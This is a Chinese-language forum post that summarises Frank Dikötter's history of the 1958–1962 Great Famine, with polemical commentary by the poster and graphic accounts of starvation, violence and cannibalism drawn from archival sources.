天易网

 找回密码
 注册
查看: 9185|回复: 3

[马列斯毛] 中共专制暴政谋杀性大饥荒铁证如山

  [复制链接]
发表于 12/20/2013 16:36:14 | 显示全部楼层 |阅读模式
本帖最后由 郭国汀 于 12/20/2013 16:43 编辑




中共极权专制暴政谋杀性大饥荒杀害四千五百万中国人铁证如山!
《毛泽东的大饥荒:1958-1962年中国历史上最具毁灭性的大灾难》郭国汀精选编译

南郭点评:这是一部值得所有关注中国前途与命运的必读之最佳历史研究权威专著中国大陆学者,特别是体制内专家,不可能真实披露中共人为制造的人类历史上最恐怖最荒诞的大饥荒真相。比如杨继绳先生和曹树基先生,虽然杨根据中共官方数据认定大饥荒导致非正常死亡人数为3600万人,而曹树基则根据中共官方公布的年鉴和上千册地方志披露中共暴政谋杀性致死人数为了3200万人。张女士在《毛泽东鲜为人知的故事》中估计之3800万人饿死主要依据人口出生率与死亡率比较推论。然而,伦敦大学和香港大学中国历史教授迪科特先生,通过专门调查小组,查阅全国各地党政公安内部档案比较研究中共最高层公布的各种资料,运用社会科学研究方法得出了令人信服的结论:“赵紫阳组织200人组成的专案调查小组报告确认的4300万至4600万人死于中共人为制造的大饥荒不但真实可信,而且极可能被中共暴政谋杀性大饥荒致死的中国人达5000万至6000万”。吾以为迪科特教授有关中国1958年至1962年大饥荒的研究,是迄今全球该专项研究最专业也最权威的成果。全书约40余万字,译者浓缩编译成11000字的精要,南郭忠心感谢迪科特教授这一功德无量的贡献。

极度无知狂妄祸国殃民的“大跃进运动”源于毛泽东1957年出席莫斯科十月革命纪念四十周年大会,因赫鲁晓夫在会上宣称苏联将在十五年内超过美国。毛泽东当即咵海口也宣称中国将在十五年内超过英国!毛回国后,越发头脑发热,由15年而7年最后变成二年!刘少奇,邓小平,李富春,柯庆施,李井泉,黄敬,吴芝浦,曾希圣,陶陆家等支持大跃进,虽然陈云,毛的秘书田家英及薄一波极力反对(陈、田和薄是中共党内较有科学常识之士)。李富春称中国仅需要七年超过英国,钢和其他主要产品可在三年内超之。19586月毛问冶金部长王何寿“可否钢产量翻番?”“没有问题!”王部长不假思索答道。柯庆施称仅华东便能产800万吨,王任重,陶柱,谢富治,吴芝浦,李井泉个个赛吹牛。[1]刘少奇于195898日访徐水公社时对农民及7月间在一家电厂对工人说:“中国将迅速进入共产主义,无需太久,你们许多人将看到共产主义。”“超英不再是15年的问题,两叁年便足够了。”[2]随即全国四千万人日夜奋战在50万个土高炉,史称全民大炼钢运动。结果是不到三分之一土高炉生产之铁能用,直接经济损失超过50亿元,不包括建筑物、森林,矿山和人命的损失!

1957年毛赴苏联出席十月革命纪念后,毛即决定扩大天安门广场使之能容纳四十万人,于是集中全国力量,在北京兴建十大建筑;拆除上万坐民房,工厂,光建人民大会堂即用了1700吨劣质钢材,结果上行下效,全国各地大建面子工程。例如哈尔滨花五百万元建造比北京饭店还贵的解放宾馆,另花七百万元建解放广场;天津亦建了一座可容八万人的解放广场;太原、沈阳纷纷建解放广场;江苏投入两千万元兴建解放庆祝项目。(163-165)各省纷纷兴建十大项目,兰州建比人民大会堂小一半的人民会堂,人民广场,工人文化宫,少数民族文化宫,豪华宾馆,图书馆,新的省委大楼,省人大,电视塔,中央公园,合计共花一亿六千万元。成千上万民房被强拆,造成数万居民在寒冬无家可归;196012月省委书记张仲连失势后,几乎全部项目变成半途而废墟;予170名外国专家专门建造人均60平米的豪华套房,同时市内大量农民冻饿而亡。[3]

刘少奇的老家花明楼公社书记胡仁青兴建他的十大项目,其中“猪城”长达十里,强拆毁无数农民房屋,19614月日刘少奇返乡调查时看到空荡荡猪城仅几十头弱不禁风的猪。由于强制建十大项目,近50平方公里的谷物任其烂在田里,无人收割。(原文是half a millionkilos of grain rotted in the fields,似乎表述不够明确)1960年该公社有些生产大队的死亡率高达9%。在广东DF公社也建了一座可容1500人的人民会堂,拆毁80余间民房,取其木材砖瓦等建材,该社有数千人饿死。(166)三年期间至19619月全国总计花费996亿元在这些面子工程上,另拆毁平民价值92亿元的民房;大多数资金投资于豪华项目或被党政干部贪污,这还不包括以建项目名义被骗走的巨额资金。例如,贵州省尊义地区四百万元,包括救济金被干部贪污;TANFZI县拟建六所中学的全部资金被挪用建了一个剧院。[4]连李富春也感叹不已:“人民没有饭吃,我们却大建魔天大楼,我们共产党怎么能如此没心没!这还象共产主义?整天空谈人民利益?”(166

大量极宝贵的历史文化遗产毁于一旦:广东QUJIANG唐朝明相张九龄墓被挖宝而毁;在绍关明朝佛寺被拆取建材;广东林则徐建之炮台鸦片战争遗址,被拆除取铁炼钢!公元三世纪修建之纪念四川都江堰水利工程的寺院被拆充作燃料!1957年刚被宣布为历史文物的ERWONF寺被部分炸毁;万里长城的城墙砖块被大量拆取建材,而明十三陵,在当地党委批准下,明永乐帝墓40米乘9米的墙被拆毁。(168)毛泽东在19581月南宁会议上定调:北京城墙应当拆掉。结果1959年北京城墙绝大多数不复存在,其他各大城市紧跟其后,南京城墙灰飞烟灭。农民房屋惨遭史无前例的强拆取材及充作肥料。[5]

1957年全国钢产量为535万吨,19582月计划620万吨,5月加至850吨; 6月增至1070万吨;9月再涨到1200万吨。毛此时开始相信“1960年底超过苏联,至1962年钢产量超过一亿吨时超过美国;然后数年内将达一亿五千万吨,到1975年达七亿吨,将英国远远抛在后面”![6]

同时全国展开了一场轰轰烈烈的大兴水利工程,积肥,深耕,密植,人民公社化,群屠牲畜,灭四害(臭虫,蚊子,老鼠,麻雀),于是共产党利用民兵强制民工日夜干活,收缴全部粮食,随意克扣口粮份量。

事实上,1958年已出现饥荒迹象,19583-4月即已开始缺粮饥荒并漫延全国。广西六分之一的人口缺粮,部分县已饿死人;山东67万人挨饿;安徽130万人陷入饥荒;湖南十分之一的人口已短粮一个月;广东近100万人挨饿,其中惠阳,湛江特别严重出现农民卖儿女现象;河北因缺粮致成千上万农民外出讨饭,苍县、保定、丹阳亦出现卖儿女;天津涌入14000乞丐;甘肃许多农民吃树根,数百人已经饿死。这还仅是春饥荒,入厦后部分地区更加严重,云南吕梁六分之一的人口饿死于19581月至8月期间,共1610人,有些是被打死,大多死于饥饿和疾病。[7]

由于剥夺虚弱无法干活的农民的口粮,云南曲静地区82000人饿死,谢富治195811月书面汇报毛,毛从此特别欣赏谢,一年后将谢提升为公安部长。(68195811月日时任外长的陈毅公开称“现在我们有一些人病饿而死,这算得了什么?!”[8]农业部长谭震林估计581月全国五百人患饥饿导致之水肿,七万人业已饿死。周恩来确认十二万人已饿死。[9]1959年上半年大饥荒已漫延全国。

1958年厦,上海奉贤县一份报告在高层广传:在反右运动中100多人被逼自杀,更多的人被强迫劳动累死。数千人被标上地主,反革命标签批斗,酷刑,劳教。(24)兰州大学超过一半学生被插白旗。19583月日毛泽东在听江苏省委书记江畏清汇报时说:吴芝浦称他可以移动300亿立方米土方,我想这将死三万人;曾希圣说他将移动200亿立方米土方,那将死两万人。你只动六亿土方,可能不会死人。”[10]

1959年镇压彭德怀反党集团反右倾翻案,仅北京一地,数千名高官被清洗,包括300名中央委员,超过60人被打成右派分子;在甘肃,超过一万名干部被清洗;全国范围内任何对大跃进持异议者全部被开除。1959年至1960360万党员被标签为右派或清洗。

荒唐至极的是在中共人为制造的史无前例的大饥荒高峰期间(19601961年),中共用卖国库黄金和白银筹积的外汇从国际市场购买大量谷物分别运往东德16万吨;赠送阿尔巴尼亚6万吨;赠予圭亚那一万吨。

古今中外绝对仅有的荒唐暴政。1950年至1960年中国对外援助共花四十亿元人民币。其中28亿是无偿援助;12亿是无息或低息贷款。绝大多数无偿捐赠发生于1958年以后。而1958年夏全国已开始大量饿死人!在1959年全国业已饿死至少800万人的情况下,毛下令设立“对外经济关系局”,专门负责对外经济援助!于是1960年对外援助四亿二千万元;1961年对外捐赠达六亿六千六百万元!其中援助缅甸八千四百万美元;援助简浦寨1120万美元;援助越南一亿四千二百万芦布;捐赠阿尔巴尼亚一亿一千二五十万芦布;同时砍掉教育和医疗经费十四亿八千万元!一边在大批饿死人,同时中共当局却大量进口工业产品。1958年中国从东德进口价值120万芦布,次年再进口100万,并不急需的工业产品;(741958年从英国进口2700万英镑,次年进口2400万英镑;1958年自西德进口68200万马克,次年,54000万马克;自1957年始,中国不断要苏联进口先进的军工和技术产品。19599月周恩来函苏联称北京计划1960年花16500万芦布购苏联军工设备。(75)中共1957年至1962年购苏联军工设备和技术金额195712800万,5810900万,5920100万,6017600万,612400万,624100万。欠苏联债务1950年至1962年总计:140700万芦布。在中国大量饿死农民的1957年至1962年期间,中共出口苏联粮食1957806000吨;58934000吨;591418000吨;60640000吨;6112000吨;油类195757000吨;5872000吨;5978000吨;6041000吨;61400吨。[11]而周恩来负责全面撑控外贸。

我党中央和我国政府同意越南中央和政府提出的要求,借给他们8-10万吨大米,存放在我国,待越方需要时运去。这是1960729日,中共中央批复给外交部和外贸部的一份电文。越南政府一度库存粮食只剩下2万吨,还不足全国半个月的供应量。中国在此时同样经历着建国以来最大的自然灾害威胁,已经有许多地方开始用草根、树皮充饥。这种情况下,中国却选择把10万吨大米借给遇到同样危机的越南。一系列解密档案显示,在1959-1960年中,中国的对外援助并没有减少,反而有所增加。输入援助两个字,年号锁定在1960年,外交部解密档案中共有99个相关档案。这一年,中国的对外援助达到3.63亿元人民币,偿还外债6.73亿元人民币[12]
国务院办公室公然欺骗国际社会称:“中国绝对没有饥荒”!外长陈毅两度拒绝日本外长提议之援助中国十万吨小麦。更恶劣的是,明知全国已饿死数千万人,毛泽东却公然对来访的未来法国总统密特朗撒谎:“不存在饥荒,仅是一个短缺期间”。

全国各地纷纷设立旨在阻止农民逃难的收容遣送站,负责拘留逃难农民强制遣回农村。大饥荒高潮时全国有六百个收容遣送站。仅在八个城市从南方的广州至东北的哈尔滨1960年即收送了五万人;而四川省光1960年即收遣了38万人。中国的户口制度学自苏联1938年的国内护照,1951年首先在城镇,1955年始在农村实行,到1958年变成法律,区分城市居民与农民,孩子从母入户口,从此农民事实上变成中国最底层的贱民。据1960年内政部报告显示:在山东收遣站不仅没收粮票,火车票,而且将难民打得遍体鳞伤,女性被任意凌辱;在甘肃天水县八分之一的看守人员曾强奸至少一名难民妇女;所有的看守习惯性地殴打被拘难民,女性被威迫,殴打或罚饿以便取得性贿赂;饥荒难民被贬称作盲流或惯流。[13]

将偷少许食物的儿童关进猪圈,劳教所在全国相当普遍。上海奉贤公安局关押超过2006-10岁的儿童于劳教所,他们被体罚,踢,跪,针剌手掌,上手铐。(249)在大饥荒年月南京每月平均发生两起因食物引发的家庭谋杀案,大多数为男性暴力侵害女性和儿童;五分之一是长子犯罪杀害亲人,因为他们已成为负担;在柳河一名残疾女孩被父母扔进池塘;在江浦,一名八岁咙哑男童,因偷家中及邻居食物,在夜间被父母勒死后肢解;有些案例是故意饿死家中虚弱的成员。[14]

饥荒期间无罪(或过错)重判现象荒唐透顶。一个1945年入伍1957年退伍的军人邓宝真因偷了两条价值合计17元的裤子1958211日被判12年徒刑;一个不识字的农民陈志文因在前门公车站偷窃被判15年,另一农民在北京百货商店偷少许商品被判15年。北京延庆县一位62岁的老人因未抓获足够的麻雀被关入劳教所一个月;(291)在大跃进期间每年被关入劳改劳教所的人员至少800万至900万,其中约180万至200万劳改。因疾病和饥饿致死的两劳人员,约一百万死于劳改,至少三百万至四百万死于劳教。[15]

公安部长谢富治19604月日对部下说:1958年以后政策已是少抓,少杀,少管;1959年杀了四千五百人,抓了213000人,管制了677000人;1960年应杀四千人。河北省一份公安文件显示:1958年全省有16000反革命被捕,比两年前多三倍,即1956年被捕的反革命近6000人,另捕了20000名普通刑事犯;1959年捕1900名反革命,5000名普通刑事犯,1960年和1961年被捕的反革命人数略同。1959年枪决800人。[16]

甘肃夹边沟劳改场1957年关押2300名右派,19602月已饿死1000人,因民政部长钱英调查偶然发现并干预,全部移至另一农场,两个月后又饿死640人,到省委书记张仲连倒台时仅不到600人生还。该省人犯82000人,分布在上百个劳改场,仅72000人生还,光1960124000名人犯饿死。在四川环水,超过三分之一的人犯饿死。[17]

公安部长谢富治承认:1960年,有180万人犯分布在1077个工厂,矿山;及440个农场,1958年和1962年死亡率各约为5%1959年到1961年死亡率是10%,超过70万人犯死于饥荒和疾病。人犯仅1960年即创收三百万元,另产粮75万吨。

大饥荒期间党干及民兵在全国活活打死人的现象极为普遍,在一份向周恩来的报告中指出:湖南全省86个县市有82个县市发生党干及民兵打死农民事件;在湖南道县1960年数万人死于饥荒,但调查小组经详细查证得出结论:仅90%直接死于饥荒或疾病,另10%是被党员和民兵活埋,用棍棒打死或其它方式杀害。在湖南SHIMEN县,大饥荒死亡的受害者中12%是被打死或被逼死;在河南新阳地区,1960年饿死100万人,李先念率调查组认定其中6-7%是被打死;在四川省被打死或被逼死的比率高得惊人,其中开县丰乐公社受害者中高达65%是被打死或被逼自杀而亡!

大饥荒期间吃人案件档案很少纪载,但各地公安局的报告相当详细。甘肃XILI县一个村,有个农民先挖小孩死尸吃,后杀了一位村姑煮了吃,邻居因闻到肉味举报后败露。吃人案件全部被掩盖不公开报导。甘肃省委书记张仲连亲自听汇报通谓,玉门,武山,汀明及武都县发生吃人事件,但他以没有证据否认,并归因为“坏分子造谣”。山东省委书记舒童亦掩盖吃人案证据,因担心吃人案会损及其名声;四水县长王林琪带公安逮捕吃人的农民,在向上级汇报的报告中,归因吃人案是由于坏分子企图污蔑党的声誉。兰州林夏地区两年内饿死54000人后,调查组进驻报告列举了58例在城市中发现的吃人事件,不包括全区:

1960225日,HONGTUI公社YAOHEJIA村,杨仲胜杀害弟弟后吃了他。贫民MA MANAI 全家四口人,挖掘13具死尸吃了它们。196019日在MANJI公社ZHANGSAMA村,农民康加迈砍死同村农民MAHAMAIJI煮吃。19603月日洪泰公社贫农朱宣喜夫妇掘出长子死尸煮吃。26位受害人分三类:砍杀后吃(12人);死后被吃(16人);掘死尸煮吃(48例),被吃的有一半是同村人,另一半是陌路人被杀后吃,仅一人是家庭内杀吃。但LINXIA吃人事件并非例外。[18]

1961年初一个调查组至四川SHIZHU桥头他们被吃人的普遍震惊,深入调查了一个大队后,发现16个受害人,18位犯罪人。一个七十岁的老妇人,掘起两个儿童死尸煮吃。有些案件仅吃了部分人体,MAZEN的心脏被挖出;多数死尸已腐败因而和着调料吃,相互换吃小孩,杀吃是极少数,绝大多数是吃死人和掘死尸煮吃。[19]
任何想如实报告情况的干部和公安均被打成右派。四川文江县公安局长赵健,发现1959年比1958年少了27000人,由于拒绝按上级指令更改数据被撤职。河北省长刘子厚1960年向毛汇报全省4700人非正常死亡,他自已的调查人员发现仅在一个县自1958年已饿死18000人![20]

仅四川一个省在中共人为制造的古今中外绝无仅有的大饥荒期间至少1000万人被饿死打死逼死或以其它各种方式杀害。王伟志先生依据北京公安局统计资料,确认全国至少有56个县死亡率超过10% 被列为“恐怖地区”:四川18个县名列榜首(Shizhu, Fuling,Rongzian, Dazu, Ziyang,Xiushan, Yayang, Nanxi, Dianjiang, Leshan,Jianwei,Muchuan, Pingshan, Bixian, Yaan, Lushan, Seda等县);安徽11个县次之(Chaoxian,Taihe,Dingyuan, Wuwei, Xuancheng, Haoxian, Suxian, Fengyang,Fuyang, Feichong, Wuhe);河南10个县(Guangshan, Shangcheng,Xincai, Runan,Tanghe, Xixian, Gushi, Zhengyang, Shangcai, Suiping);贵州(Meitan,Chishui, Jinsha, Tongzi)、青海(Huangzhang, Zaduo, Zhenghe)、山东(Juye, Jining,Qihe, Pingyuan)各四个县;甘肃三个县(Tongwei,Longxi, Wuwei);湖南(Guzhang)和广西(Huanjiang)各一个县。与之相应的是:所有这些省份的党委书记全部是毛泽东最铁杆的支持者。四川与大多数其他省份不一样,大饥荒持续到1962年底。直至1962年底四川全省各县无数报告继续报告饥荒。该年1.5%的人口因饥饿而死,意味着另外30万人死于饥荒;根据四川省公安局统计资料确认四川820万人死于饥荒。即使该数字无疑少报至少10-20%因为李井泉始终牢控四川省,尽管他应对上千万人饿死负责。即使1962年,也很少干部敢于准备如实报告饥荒真相。[21]共产风,瞎指挥,胡命令,剥夺全体农民的私有财产实质使之变成共产党的奴隶。四川省委书记李井泉下令“让荒山变良田”,令农民放弃现有的良田开荒造田;大建公共食堂,巨型养猪场,大市场。在FULING 宝兹公社,1959年公社书记虚报产量由3500吨变成11100吨,结果国家征走3000吨;民兵挨家挨户搜查藏粮,按人的体重划分右派,胖者即成右派,许多人被没完没了的迫害致死。最后农民只能吃树叶,观音土。该公社有些村超过三分之一的村民饿死。1961年农产品87%被强制征收,结果全社15000人有一半饿死。[22]FULING县,有些村在1960年一个月内饿死9%,整个地区大队平均死亡率40-50%相当普遍。重庆其他县1960年死亡率超过10%。在SHIZHU县,民兵抢走全部锅碗,禁止公共食堂之外煮食物。专设打人队依赖暴力维持秩序。公社副书记陈志林殴打了数百人,打死八人;有些人被活埋。据县公安局报告称,全县1959年至60年饿死64000人占人口20%;在水田公社四十人被集体掩埋,在县政府路旁另外六十人被集体掩埋。

共产党支部书记们利用职权强奸妇女和少女在谋杀性人为大饥荒期间是全国性现象:
Two partysecretaries of a commune in Wencheng, Guangzhou, raped or coerced into sexthirty four women in 1960; in Hongshui, Hebei, three party secretaries add adeputy county leader have sexually abused women rationally, one of them havinghad sex with several dozen, a party secretary of Gu Jiaying village raped 27women, taken liberties with almost every unmarried women in the villiage. LiDengmin, party secretary of Oumo, raped 20 women, two of them under age; inLeiyang, hunan, 11 to 12 years old girls were sexually abused. In Xinagtan, acadre set up a ‘special team’ of ten girls whom he sexually abused at whim. [23]
In a factory inWugang county, Hunan, local bosses forced women to work naked. On Aug 1958, asimgle day 300 women went to work in nude, those who refused were tied up; [24]equally crude and humiliating were the nude parades, which happened across thecountry: women were made to march through the village naked; in Suichangcounty, Zhejiang, men and women accused of larceny were stripped naked andparaded. In Guangdong, a village militia stripped two young women and tied themto a tree, using a flashing light to explore girl’s private part, bothcommitted suicide. [25]whilethe party was steeped in a culture of violence, fostered by decades of ruthlesswarfare and ceaseless purges, the real watershed was the Great Leap Forward.Communes left children without mothers, women without their husbands, elderlywithout their relatives.

时任湖北省委书记的王任重1961年痛苦地指出:当国家处于饥荒年月,湖北省从北京仅获得20万吨救济粮,同时却被迫出口400万吨!(811959年湖北省拒绝增加原计划48000吨再增加出口23000吨;四川省委书记李井泉却同意增加四四川原计划的三分之二份额;安徽省委书记曾希圣批准原计划23500吨再加5000吨;贵洲,青海,甘肃仅完成原计划三分之一,福建省未提供一吨。1959420万吨谷物出口,其中142万吨出口苏联;100万吨出口东欧;160万吨出口资本主义国家。[26]83

19591月时任广东省委书记的赵紫阳向中南局书记陶柱汇报称:“许多公社藏匿粮食,仅在一个县即发现藏粮35000吨。(85)据此,赵发起一场反藏粮运动,挖出100万吨粮食。陶表扬之并向毛泽东汇报。随后安徽曾希圣报告称:“所谓农村缺粮问题,与缺粮无关,也与国家过度征粮无关;它是意识形态问题,特别是地方干部的问题。”毛立即转发上述报告并批示:“生产队干部藏粮私分非常严重。遍及全国,必须立即解决!”毛指示清洗5%的地方干部,几个月后悄然将比例增加到10%[27] 1959年厦天以后,全国各地民兵强制挨家挨户强制翻箱倒柜挖地拆墙,查藏粮。结果许多地区农民很快便被迫吃树叶,茅草,石膏,观音土![28]1959325日在上海锦江饭店召开的中共最高层秘密会议上,毛下令征收三分之一谷物,“如果不超过三分之一,人民不会造反”。“当没有足够吃的,人民饥饿而死人时,最好让一半人死,腾出另一半口粮让另一半人活”。[29]亦即毛明知全国饥荒已大量饿死人之际,却秘密鼓励党干强制征粮!

195972日芦山会议上,大多数高干不敢公开议论更不用说批评大跃进,彭德怀致函毛泽东后,惟有总参谋长黄克诚公开支持彭,湖南省委书记周小舟称赞之,而副外长张闻天公开支持彭并批评大跃进,张指出:土高炉炼钢花费了五十亿元,更不用说森林,农产,人命的损失。错误与成就是九比一;其间甘肃发生一场政变,致函大会一封公开函称:甘肃已饿死数千人,150万农民陷入饥荒待死,19594月开始饿死人。718日赫鲁晓夫公开批评人民公社化。林彪被毛特意召上山后,公开力挺老毛,但他私下在日记中却写道:“大跃进是基于妄想,完成是一场闹剧”。[30]彭真成为清洗彭德怀的急先锋:“斗争应当深入,应当按照我们的原则深入展开,即便是针对老首长,老同事,甚至夫妻之间也毫不留情”。[31]

因大饥荒导致大量农民彻底破产卖儿女及丢弃儿女相当普遍。南京仅1959年便有2000名弃童。1959年夏天武汉每日有四至五名弃童;湖南1961年夏天有21000弃童进孤儿院,更多的弃儿未登记在案。但绝大多数孩子与父母一道饿死。即便在城市,如石家庄一半新生儿饿死,因为母亲们没有奶水。四川省约03-05%系孤儿,即全省至少有18万至20万孤儿。[32]

由于一切土地生产工具甚至房屋皆已充公,已没有任何剌激人们积极性的手段,同时地方干部面临完成生产计划,高额征粮的巨大压力,只能动用强制手段逼迫农民。初期扑面而来规模的宣传动员,每天开会高音喇叭洗脑或许起一定作用。时间一长即失灵了。因此为强迫农民干活,罚跪,头顶重物,棍击,非常普遍。QINNA PENG 公社书记任钟广亲自殴打陆今福20多分钟,因他拒绝到水利工地劳动。清洋公社书记邓仲兴为了完成指标亲自殴打了200多名农民,打死14人;湖南花明楼水库刘申茂被党支书记打得脑浆横流,因他太虚弱无法出工干活。湖南一们党委书记区得胜拳击150多位农民,打死四人,“若你们想做个党员,必须学会怎样打人”,他对新党员说。在湖南道县“到处是酷刑场”,一个生产队长打死13人,另9 人随后因伤重而死亡。全国或许超过一半的干部时常拳击或鞭挞那些农民。1959年至1960年在湖南黄蔡水库工地16000名农民工,有四千人被拳打脚踢,400余人被打死。在广东罗定公社,超过一半的干部殴打农民,近一百人被用棍棒打死。河南省1960年超过100万人非正常死亡,绝大多数系饿死,但约67000人系被民兵和干部打死。[33]

由于农村陷入饥荒,干部们必须借助于更大的暴力才能驱赶农民们下田或下工地干活。(不听话或敢于示不满者)有时被捆绑后或被剥光衣服后扔进池塘。在广东罗定,一个十岁的孩子因偷了少许小麦,被捆绑后抛入一个沼泽中,几天后死去。在广东一个公社数千农民在寒冷的冬天被强迫干活,凡是反抗者全被剥光衣服受冷冻体罚。[34]

在湖南浏阳,一个由300名男女农民组成的民工队,在冬天被强迫光着膀子干活,结果七分之一被冻死,因为党书记认为冷天将使农民们更卖力地干活暖身![35]亦即共产党暴政下的中国农民连奴隶都不如。

人格污辱,践踏中国传统文明,毁灭尊老爱幼的传统伦理道德规,如家常便饭。在广东,一个80岁的老太婆因举报队长偷米,被强制按入尿缸里。广东汕头附近的龙贵公社,未完成生产指标的农民被强行按入粪便池里,强迫喝尿水或用火烧手,或强灌粪便入口。一个由于饥饿体弱的农民黄兰英因偷一只鸡被生产队长强迫下牛粪。农民刘得胜因偷一块地瓜,被浇尿水于头,并与其妻及子一道被强迫入粪池,因他拒绝吞下粪便,被用钳子撑开他的嘴巴后硬灌,三周后含恨死去。[36]

一个广东农民陈弟因偷了一些食物,被民兵陈球捆绑后割掉一只耳朵。另一个农民王自由因挖了一只土豆,一只耳朵被割掉,腿被捆绑,背上吊一块十公斤的石块,然后用烧红的铬铁烫。在湖南YUANLING县,一个农民睾丸被击打,腿被火铬,鼻子穿铁丝,耳朵被串通后吊在墙上。在浏阳,农民被用铁丝捆绑;在四川简阳,农民被用铁丝穿耳,用针刺指;在广东数个地区用兽医用针筒注谢盐水入人体。有时丈夫和妻子被强制相互殴打,有些人因此被打死。人民被恐赫枪决,活埋,确实有好些人被活埋。全国到处发生游街示众,强制理阴阳头,剥光衣服,泼墨水于脸及头部,红卫兵的发明很少,全部酷刑污辱刑在大跃进期间均已普遍。

在湖南SHIMEN 毛冰献全家人饿死后,大队党支书禁止人们掩埋之,一周后,老鼠吃了他们的眼睛,农民们对调查人员说:我们农民连猪狗都不如,当我们饿死后,无人埋葬我们。[37]南京公安局档案显示1959年上半年约200人投长江自杀,大多为女性。

安徽凤阳县335000农民约四分之一饿死。在湖南湘潭,一万人饿死,有些干部认为河南XINYANG与湘潭相较并不太过;大量村庄仅在一年内便饿死超过30%的村民,有些村整个村庄死绝。

在贵州CHISHUI ,自1958年十月至1960年四月,约24000人饿死,超过该县人口%。县委书记王林琪令深耕一米半,深耕毁了许多良田。密植每下种子200450公斤,有些甚至一至三吨。大跃进的结果,农业产量暴跌;他将农民划分为贫富农,“贫农与富农之间是你死我活的斗争”。上千基层干部被开除党籍,三天两头搞群众运动,斗争会,反瞒产运动,根除阶级敌人运动。1960年王向贵阳高报收成的80%,多报了33500吨。而王的作为在贵州并非偶然现象,周林区长是毛的信徒,紧跟毛导致该区全国死亡率最高。在MEITON,第一书记王清澄组织五万劳动大军,兴建巨大的茶果园,欲使之成为全国模范。四万头猪集中于“万猪城”;结果45000人在六个月内饿死,而该四万五千人仍然是低报的数字,据省委调查组报告称:仅在一个公社即12000人饿死,占人口22%[38] NONGCHA村三分之一的村民饿死,1959年四分之三的收成被国家强制征走;1961年的收成仅为1957年的三分之一。1960年四月当调查组计划访MEITAN时,当地干部日夜加班将大量体掩埋在路旁,病人和饥饿得面黄肌瘦的儿童派民兵关押把守,将被农民吃光树皮的树连根挖除。以致聂荣臻1960年巡视该区后致函毛称:“事实上,贵州一点也不穷,而是非常富,将来应当成为我们在西南的工业基地”。(314

19621月北京七千人大会,刘少奇作了长达三小时的官方报告,公开重复了半年前他私下对少数高干所说的一切;“三分天灾,七分人祸”。否定毛之九个指头与一个指头之说。“我怀疑我们能否说七分成绩,三分错误;各地情况不一,一分错,九分成绩仅是极少数地区”;毛恼羞成怒打断刘:“完全不是少数地区,如,河北仅20%地区减产,江苏全省30%地区连年增产!”但刘拒绝威胁继续说道:“总体上,我们不能说仅一分错,而是三分错,在某些地区甚至错误比重更高,例如河南新响,甘肃天水,谁应对此灾难负责?应由中央领导负责。”

毛狂怒不已“刘说人祸高于自然灾害,这种说法本身即是灾难”。林彪再次为毛解围吹嘘大跃进为“史无前例的成就,与中国历史上任何时期比较。毛泽东思想总是正确。。。在许多方面而非仅在某一方面,毛是最高权威。根据我的经验,毛最突出的品质是现实主义。毛说的比其他人说的更实际。他经常非常接近现实,从不脱离实际。过去我们正确,是因为我们准备执行而非干扰毛思想。每当主席的思想未受到足够重视或受干扰,我们即出问题。这是我党过去几十年历史的基础。”[39]

刘少奇死无葬身之地的直接原因。19627月日一个炎夏之下午,毛被刘紧急召回北京后正泡在泳池里,刘赶来对毛解释为何急召毛回京,刘说他同意陈云和田家英(两位皆强烈反对大跃进)建议分田到户,以解危机;毛立即狂怒咆哮;刘不示弱“这么多人已经饿死”!然而不假思索脱口而出“大饥荒饿死人甚至吃人,你我都要被历史审判载入史书!”毛怒不可扼“三面红旗业已被打倒,现在土地还要再分田,你为抵制这些做了些什么?我死后会发生什么?”不过,刘毛很快冷静下来。毛同意刘继续执行经济调整政策。但毛此时确信刘即中国的赫鲁晓夫,将来定会揭露毛的全部罪恶。从此毛开始处心积虑谋划如何搞掉刘少奇及所有反对大跃进的高级干部。四年后“无产阶级文化大革命”爆发。[40]



[1] Frank Dikotter, Mao’s Great Famine The Historyof China most Devastating Catastrophe, 1958-1962 Walker & Co. NY 2010.p.58

[2] Frank Dikotter, Mao’s Great Famine The Historyof China most Devastating Catastrophe, 1958-1962 Walker & Co. NY 2010.p.49
quoted Jin Chongji and Huang Zhong, Liu Shao QiZhuan.pp.832-3.北京,中原文献出版社,1988

[3] Frank Dikotter, Mao’s Great Famine The Historyof China most Devastating Catastrophe, 1958-1962 Walker & Co. NY 2010.p.165

[4] Frank Dikotter, Mao’s Great Famine The Historyof China most Devastating Catastrophe, 1958-1962 Walker & Co. NY 2010.p.163-65166

[5] Frank Dikotter, Mao’s Great Famine The Historyof China most Devastating Catastrophe, 1958-1962 Walker & Co. NY 2010.p.168

[6] Frank Dikotter, Mao’s Great Famine The Historyof China most Devastating Catastrophe, 1958-1962 Walker & Co. NY 2010.p.58

[7] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p.67

[8] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p.70Nowwe have a few cases of illness and death: it’s nothing!

[9] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p.89

[10] Frank Dikotter, Mao’s Great Famine The Historyof China most Devastating Catastrophe, 1958-1962 Walker & Co. NY 2010.p.11

[11] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p.76

[12] 1950-1962年中国偿还外债和对外援助支出(亿元)年份偿还外债对外援助:19501955 6.80 12.601956 5.97 4.041957 6.08 4.671958 7.23 2.761959 7.11 3.501960 6.73 3.631961 6.58 5.191962 6.42 8.54
资料来源:偿还外债数摘自《中国财政统计:1950-1991(财政部综合计划司编)。对外援助支出摘自历年国家预算决算报告

[13] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.pp.327-238

[14] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p251

[15] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p296

[16] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p288

[17] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p289

[18] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p322

[19] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p333

[20] FrankDikotter, Mao’s Great Famine The History of China most Devastating Catastrophe,1958-1962 Walker & Co. NY 2010.p327

